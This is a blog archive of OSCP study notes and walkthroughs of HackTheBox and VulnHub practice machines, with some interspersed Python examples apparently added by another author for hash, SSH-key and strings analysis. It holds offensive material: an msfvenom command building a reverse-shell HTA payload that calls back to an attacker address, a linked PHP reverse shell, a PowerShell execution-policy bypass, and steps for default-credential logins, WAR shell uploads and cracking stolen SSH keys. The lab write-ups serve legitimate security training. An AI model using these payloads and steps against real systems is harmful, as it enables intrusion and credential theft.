Posts

Showing posts with the label Pentest

August OSCP Notes

August 4, 2020
sudo -u scriptmanager /bin/bash
/bin/bash -i
Sherlock for Windows. linuxprivchecker for Linux.
The Domain Controller (DC) is the head honcho of Active Directory.
Check crontab to see if root is running anything.
sudo -l to see what you can do.

August 19, 2020
https://www.youtube.com/watch?v=5Tlx7D2djes
Delete all your snapshots. Use gparted. Delete anything in the middle. Slide over.
c:\windows\system32\drivers\etc\hosts

August 20, 2020
https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php (has worked before)
php -S 0.0.0.0:80 exists, like python -m SimpleHTTPServer 80
ruby -run -e httpd . -p 9000

August 22, 2020
Can create HTA files to execute in Internet Explorer:
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

August 23, 2020
nmap --script vuln -p139,445 192.168.0.18
sudo -i (rage)

August 24, 2020
msfvenom -p windows/s...

HackTheBox: Optimum

HTB Optimum Writeup
The first thing I notice is that an HTTP server is up. It looks old. I'm gonna copy "HttpFileServer 2.3" and see what I get in Google: Well, that was easy. Didn't even have to put "exploit" at the end. Let's check out the Rapid7 page. The page points to a Metasploit module called "exploit/windows/http/rejetto_hfs_exec". I'm gonna use that first. The exploit works and we can read user.txt on kostas' desktop.
The next challenge is privilege escalation. I import Sherlock.ps1:
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
I see that MS16-098 is vulnerable. We can download the compiled binary here: https://www.exploit-db.com/exploits/41020
And there you go!

HTB: 5 out of 40 Checkpoint

HTB Checkpoint 1: 5 out of 40
I made the first checkpoint! I did four writeups:
Jerry (Tomcat)
Blue (EternalBlue, Windows 7)
Lame (Samba username map script)
Legacy (MS08-067)
Devel (no writeup). This one was just anonymous FTP and putting a shell on the box.
It should take me 1 - 4 weeks to get to the 10 out of 40 checkpoint. I'll be very busy at the end of the month. I think the boxes will get harder too. I'm guessing I'll run into some good old C. It'll be the lowest-level programming language I've touched. I thought there was only one gcc, but it turns out there are gcc builds for win32, win64, i686, and amd64. You have to take the C code and compile it for whatever machine you're attacking. I'll find out more when I get there. I know nothing about C besides that it's an old grandparent. I felt a bit challenged for 30 minutes. I'm pretty sure the mountain will get tougher but I haven't hit it yet. Just found a hill lol. The boxes so far have been easy. The way peop...

HackTheBox: Jerry Tomcat - Creds in Error Writeup

HackTheBox - Jerry
First, let's run nmap. The machine being named Jerry gave me an idea this would be a Tomcat server. Personally, I have never developed on a Tomcat server. I saw some during my pentest internship. I thought it was old technology, but it looks like the latest Tomcat release was 7 days ago. I took Tomcat 7.0.88 and pasted that into Google. There is a CVE called "Tomcat RCE via JSP Upload Bypass", CVE-2017-12617. The Metasploit module didn't work for me. I downloaded a Python script. It said my Tomcat server wasn't vulnerable. I started googling default creds for the Tomcat manager. I hit cancel and got this error. I tried tomcat/s3cret as the username and password. That worked! Don't put your username and password in the error page :\ I then made a reverse shell and uploaded it as a WAR file. I was automatically NT AUTHORITY\SYSTEM and could see the Administrator folder on Windows.

HackTheBox: Blue, EternalBlue Windows 7 SP1

Hack The Box: Blue
The hardest part about hacking this box is spelling the word "eternal". Also, the exploit is iffy and may need to be run multiple times. Try changing ports: I changed from 4444 to 5555 and it worked. ^ This sounds like some sci-fi movie.

HackTheBox: Lame Walkthrough UsernameMapScript

Lame 2 out of 40
First, let's scan the host using nmap. Ports 21, 22, 139 and 445 are open. vsftpd 2.3.4 has a smiley-face backdoor exploit. It didn't work for me. I pivoted to the Samba server. Let's see if there is an exploit for that: I changed LHOST and RHOST. I was good to go. That's it.
More info: https://linxz.co.uk/vulnerabilities/2018/11/14/Samba-username-map-script.html

Learning for OSCP: Notes

July 5, 2020
In Microsoft SQL Server you can create a shell.
SMB/Samba server on 139 or 445.
openvpn exists. Haven't used it before. HtB
Check what privileges you have in Microsoft SQL Server.
cut -d '/' -f 1 is like awk.

July 6, 2020
The switch -T4 in nmap relates to speed. T1 is slow while T5 is fast. -T4 is commonly used.
The switch -p- in nmap means scan all ports, 1-65535.
dirbuster is pretty cool. Find wordlists at /usr/share/wordlists/dirbuster/
nikto will give you basic hints and vulnerabilities.
sudo arp-scan -l is faster than nmap 192.168.0.*.
RHOSTS stands for Remote Hosts. LHOST stands for Local Host.

July 7, 2020
Rapid7 makes Metasploit.
masscan is an alternative to nmap. It was made to scan the entire internet.
/etc/init.d/nessusd start
Can install deb packages with dpkg -i example.deb
Seeing "Remote Code Execution" is good. That means we can sit at home and exploit.
Staged vs non-staged payloads...

Starting my OSCP Journey

I'm secretly starting my OSCP journey. I don't want to publicly promote it until I feel I'm about 25-50% ready. Giving a golden commitment is pretty big for the OSCP. Right now I'm having fun and learning (and moving to Chicago). I've wanted my hunter's license for a few years now. I was too busy in college. I was focused on my CCNA/CCDC at my first job. Now I'm not committed to CCDC, paying off debt, or classes. Now is the perfect time to get it. Why? Because it's hard and I like the challenge. Also, as an Avatar, my hacking skills are lacking. I can do Development, Networking, and Business (Socializing). The last skill is Hacking. When I see other Developers with an OSCP, I think they are absolutely remarkable! As a fellow Developer, when I see another Developer kicking ass in Red Team/Networking, I cheer! Do any primary-skill Devs feel this way? I've seen a few Software-Network-Hacker types and believe I can do it too. I want to be a force t...

Albania

Information:
Name: HackDay Albania 2016 VM
Creator: R-73eN
Time it took me: 10+ hours. I dropped this one in November and picked it back up today. I was having trouble getting into the MySQL database because of my shell. However, when I tried again, I had no issues.
Rating: 7/10
Recommend: Yep. This VM will help you understand the /etc/passwd file and what Linux uses as password hashes. Also good for SQL injection.

root@kali:~# nmap 10.0.2.6 -A -p 0-9000
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (...
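Since this box is about reading /etc/passwd and recognising which hash scheme Linux is using, here is an added example (mine, not code from the writeup or the VM) that parses passwd and shadow lines, names the crypt(3) scheme behind each hash from its $id$ prefix, and flags the things you would go looking for on a box like this: an extra UID-0 user, a hash sitting in world-readable /etc/passwd instead of /etc/shadow, an empty password, and fast schemes such as descrypt or md5crypt. The sample passwd and shadow contents are constructed, and the hash values are placeholders in the right shape rather than real credentials.

```python
"""Added example, not from the HackDay Albania writeup: parse /etc/passwd and
/etc/shadow, identify the crypt(3) scheme behind each hash, and flag what a
pentester looks for on a box like this. Every sample line below is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# "$id$" prefixes used by glibc / libxcrypt crypt(3).
CRYPT_IDS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "7": "scrypt",
    "y": "yescrypt",
}
WEAK_SCHEMES = {"descrypt", "md5crypt"}   # fast to crack with john/hashcat


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str
    hash_field: Optional[str] = None   # the hash (or "" / "*" / "!...") once seen
    hash_in_passwd: bool = False       # True when the hash sits in world-readable /etc/passwd


def parse_passwd(text: str) -> Dict[str, Account]:
    accounts: Dict[str, Account] = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7:            # blank or malformed line
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        acct = Account(name, int(uid), int(gid), home, shell)
        if pw != "x":                  # "x" means "look in /etc/shadow"; anything else IS the hash
            acct.hash_field = pw
            acct.hash_in_passwd = True
        accounts[name] = acct
    return accounts


def merge_shadow(accounts: Dict[str, Account], shadow_text: str) -> Dict[str, Account]:
    for line in shadow_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 2 or parts[0] not in accounts:
            continue
        acct = accounts[parts[0]]
        if not acct.hash_in_passwd:    # a hash in passwd itself is what login actually uses
            acct.hash_field = parts[1]
    return accounts


def classify_hash(h: Optional[str]) -> str:
    if h is None:
        return "missing"
    if h == "":
        return "empty"
    if h in ("*", "!", "!!", "*LK*", "*NP*"):
        return "locked"
    locked = h.startswith("!")         # "!$6$..." is locked, but the hash behind it still cracks
    core = h.lstrip("!")
    m = re.match(r"^\$([^$]+)\$", core)
    if m:
        kind = CRYPT_IDS.get(m.group(1), "unknown $%s$" % m.group(1))
    elif re.fullmatch(r"[./0-9A-Za-z]{13}", core):
        kind = "descrypt"              # traditional DES crypt: 13 chars, only 8 password chars count
    else:
        kind = "unknown"
    return "locked " + kind if locked else kind


def audit(passwd_text: str, shadow_text: str = "") -> List[Tuple[str, str]]:
    """Return (account, finding) pairs worth a closer look."""
    accounts = merge_shadow(parse_passwd(passwd_text), shadow_text)
    findings: List[Tuple[str, str]] = []
    for a in accounts.values():
        kind = classify_hash(a.hash_field)
        if a.uid == 0 and a.name != "root":
            findings.append((a.name, "uid 0 but not root"))
        if kind == "empty":
            findings.append((a.name, "empty password"))
        elif a.hash_in_passwd and not kind.startswith("locked"):
            findings.append((a.name, "hash readable in /etc/passwd: " + kind))
        if kind.replace("locked ", "") in WEAK_SCHEMES:
            findings.append((a.name, "weak scheme: " + kind))
    return findings


# Constructed sample files. The hashes are placeholders in the right shape, not real credentials.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ops:x:0:0:ops:/home/ops:/bin/bash
legacy:$1$qv5Yz3Fk$ZsRr9cLxWn0E4bHh7Jt2i1:1001:1001::/home/legacy:/bin/bash
guest::1002:1002::/home/guest:/bin/sh
"""
SHADOW = """\
root:$6$Kx3nV2cP$qJr8tYw5Ab3cDe4fGh5iJk6lMn7oPq8rSt9uVw0xYz1234567890abcdefghijklmnopqrstuvwx:18600:0:99999:7:::
daemon:*:18600:0:99999:7:::
ops:!$5$Mz8pLd1Q$Ab3cDe4fGh5iJk6lMn7oPq8rSt9uVw0xYz1234567890abc:18600:0:99999:7:::
"""

if __name__ == "__main__":
    for name, why in audit(PASSWD, SHADOW):
        print(f"{name:8} {why}")
```

Run it against a real pair of files with audit(open("/etc/passwd").read(), open("/etc/shadow").read()) once you have root. The precedence rule in merge_shadow matters: when the passwd field is anything other than "x", that value is the password hash the system checks, so a hash you can read as an unprivileged user is the one to crack.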

Covfefe

Information:
Name: covfefe: 1
Author: Tim Kent
Rating: 9.5/10
Recommend: Yes. Great experience cracking SSH private keys and learning simple buffer overflow exploits.

$ nmap 10.0.2.8 -p 0-65535
Nmap scan report for 10.0.2.8
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
31337/tcp open  Elite

Let's visit port 31337.
http://10.0.2.8:31337/robots.txt
User-agent: *
Disallow: /.bashrc
Disallow /.profile
Disallow: /taxes

We find the first flag in the /taxes directory. It looks like we're in someone's home directory... what a bad place to put an Apache web root. After dirbing the directory with fuzzdb's raft-large-files.txt (https://github.com/fuzzdb-project/fuzzdb), we find out the .ssh directory exists. Copy the id_rsa private key and the id_rsa.pub public key. Put both of those files in your own ~/.ssh directory. This will help us SSH into the server. Use ssh2john to convert the id_rsa k...
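Before handing a stolen id_rsa to ssh2john, it is worth checking whether the key is actually passphrase-protected and with what: an unencrypted key goes straight into ssh -i, and ssh2john has nothing to extract from it. The following is an added example of that check (my code, not from the covfefe writeup or from ssh2john); it understands the two layouts you meet in the wild, the traditional PEM "RSA PRIVATE KEY" file, where encryption is announced by Proc-Type and DEK-Info headers, and the newer "OPENSSH PRIVATE KEY" format, where the cipher and KDF names are the first two fields of the base64 body. The sample keys are constructed fixtures containing no key material.

```python
"""Added example, not from the covfefe writeup: check whether an SSH private key
is passphrase-protected (and with which cipher/KDF) before feeding it to
ssh2john/john. The sample keys below are constructed, not real keys."""
import base64
import struct
from typing import Any, Dict

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf: bytes, off: int):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(pem: str) -> Dict[str, Any]:
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    header = lines[0]
    if not (header.startswith("-----BEGIN ") and header.endswith("-----")):
        raise ValueError("not a PEM-style private key")
    label = header[len("-----BEGIN "):-len("-----")]

    if label == "OPENSSH PRIVATE KEY":
        # New OpenSSH format: magic string, then ciphername and kdfname as SSH strings.
        # cipher "none" (with kdf "none") means the key has no passphrase.
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(body, len(OPENSSH_MAGIC))
        kdf, off = _read_string(body, off)
        return {"format": label, "cipher": cipher.decode(), "kdf": kdf.decode(),
                "encrypted": cipher != b"none"}

    if label == "ENCRYPTED PRIVATE KEY":          # PKCS#8 with PBES encryption: always protected
        return {"format": label, "cipher": "pkcs8", "kdf": "pkcs8", "encrypted": True}

    # Traditional PEM (e.g. "RSA PRIVATE KEY"): encryption is signalled by RFC 1421
    # headers between the BEGIN line and the first blank line, not by the body.
    headers = {}
    for ln in lines[1:]:
        if not ln:
            break
        if ":" in ln:
            k, v = ln.split(":", 1)
            headers[k.strip()] = v.strip()
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = headers.get("DEK-Info", "none").split(",")[0]
    return {"format": label, "cipher": cipher,
            "kdf": "EVP_BytesToKey(MD5)" if encrypted else "none",
            "encrypted": encrypted}


def _openssh_key_header(cipher: bytes, kdf: bytes) -> str:
    """Constructed fixture: only the openssh-key-v1 preamble this check reads, no key material."""
    body = OPENSSH_MAGIC
    for s in (cipher, kdf, b""):           # ciphername, kdfname, kdfoptions
        body += struct.pack(">I", len(s)) + s
    body += struct.pack(">I", 1)           # number of keys
    b64 = base64.b64encode(body).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


KEY_OPENSSH_PLAIN = _openssh_key_header(b"none", b"none")
KEY_OPENSSH_ENC = _openssh_key_header(b"aes256-ctr", b"bcrypt")
# Constructed PEM fixtures; the body is a base64 placeholder, not a key.
KEY_PEM_ENC = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A1B2C3D4E5F60718293A4B5C6D7E8F9

UGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""
KEY_PEM_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
UGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in [("openssh plain", KEY_OPENSSH_PLAIN), ("openssh enc", KEY_OPENSSH_ENC),
                      ("pem enc", KEY_PEM_ENC), ("pem plain", KEY_PEM_PLAIN)]:
        print(name, inspect_private_key(key))
```

Pass the contents of a real id_rsa to inspect_private_key; if "encrypted" is False, skip ssh2john entirely, and if it is True the "kdf" field tells you what you are up against (bcrypt-KDF keys are far slower to crack than the old MD5-derived PEM keys).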

Bulldog

Information:
Name: Bulldog
Author: Nick Frichette
Link: https://www.vulnhub.com/entry/bulldog-1,211/
Time it took me: 6-7 hours.
Rating: 7/10. It was alright. The hard part wasn't getting a shell on the box, but the privilege escalation. The good thing about this box is that it was my first time interacting with Django. I also learned about the strings command, which prints the printable strings found in a binary.
Recommend: Yep.

$ nmap -A 10.0.2.7 -p 0-10000
Nmap scan report for 10.0.2.7
Host is up (0.00039s latency).
Not shown: 9998 closed ports
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)

SSH is running on port 23 instead of 22. That's good to know. We see the Bulldog site is running on Python's WSGIServer (the Django development server). Let's spider it with dirb.

$ dirb http://10.0.2.7/
---- Scanning URL: http://10.0.2.7/ ----
==>...
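The strings command mentioned above does something very simple that is worth seeing once in code: it scans a file for runs of printable bytes of at least four characters and prints them. Here is an added example of that (my re-implementation, not the GNU binutils strings and not code from the Bulldog writeup) with the UTF-16LE variant that strings -el provides, which is what finds wide-character strings inside Windows binaries that the plain ASCII scan walks straight past, plus the grep-style filter you would normally pipe the output through. The sample blob is constructed.

```python
"""Added example, not from the Bulldog writeup: a minimal re-implementation of
strings(1) to show what it does (extract runs of printable bytes from a binary),
the 16-bit little-endian variant (like `strings -el`), and a grep-style filter.
The sample binary blob below is constructed."""
import re
import sys
from typing import Iterable, List

PRINTABLE = rb"[\x20-\x7e]"          # space through tilde: what strings treats as printable ASCII


def strings(data: bytes, min_len: int = 4) -> List[str]:
    """ASCII runs of at least min_len printable bytes (strings' default is 4)."""
    pat = re.compile(PRINTABLE + b"{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def strings_utf16le(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable UTF-16LE characters (each ASCII byte followed by a NUL),
    which the plain ASCII scan misses because the NULs break every run."""
    pat = re.compile(b"(?:" + PRINTABLE + b"\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pat.finditer(data)]


def interesting(strs: Iterable[str],
                needles=("pass", "key", "secret", "token", "http", "/bin/", "select ")) -> List[str]:
    """Equivalent of `strings foo | grep -i -E 'pass|key|secret|...'`."""
    return [s for s in strs if any(n in s.lower() for n in needles)]


# Constructed "binary": an ELF-like header, non-printable junk, an ASCII credential string,
# a UTF-16LE Windows path, a run too short to report, and a shell path.
SAMPLE = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(0, 32))
    + b"db_password=Ch4ngeMe!\x00"
    + b"\x90\x90\xcc\xff"
    + "C:\\Users\\Admin\\secret.txt".encode("utf-16-le") + b"\x00\x00"
    + b"ok\x00"
    + b"/bin/sh\x00"
)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for s in strings(blob):
        print(s)
    for s in strings_utf16le(blob):
        print("(utf-16le)", s)
    print("interesting:", interesting(strings(blob) + strings_utf16le(blob)))
```

Run it with a path argument to scan a real file; the point of the UTF-16 pass is that "C:\Users\Admin\secret.txt" never shows up in the plain ASCII output, because in the binary every character is followed by a NUL byte.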

LazySysAdmin: 1.0

Information:
Name: LazySysAdmin 1.0
VM Creator: @TogieMcdogie
Time it took me: 2-3 hours.
Pentest skill level: less than a year.

To begin, use nmap:
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: LAZYSYSADMIN)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: LAZYSYSADMIN)
3306/tcp open  mysql
6667/tcp open  irc         InspIRCd

The box description said "linux enumeration". Samba is a file sharing server that speaks the SMB protocol. It can be used with Windows, Linux, and Mac. I always thought Samba was a "Windows thing", but I suppose not. Use the tool enum4linux. I used: enum4linux -a 192.168.0.15

[+] Attempting to map shares on 192.168.0.15
//192.168.0.15/print$  Mapping: DENIED, Listing: N/A
//192.168.0.15/share$  Mapping: OK, Listing: OK
//192.168.0.15/IPC$    Mapping: OK Listing: DENIED

We see the /share$ folder ...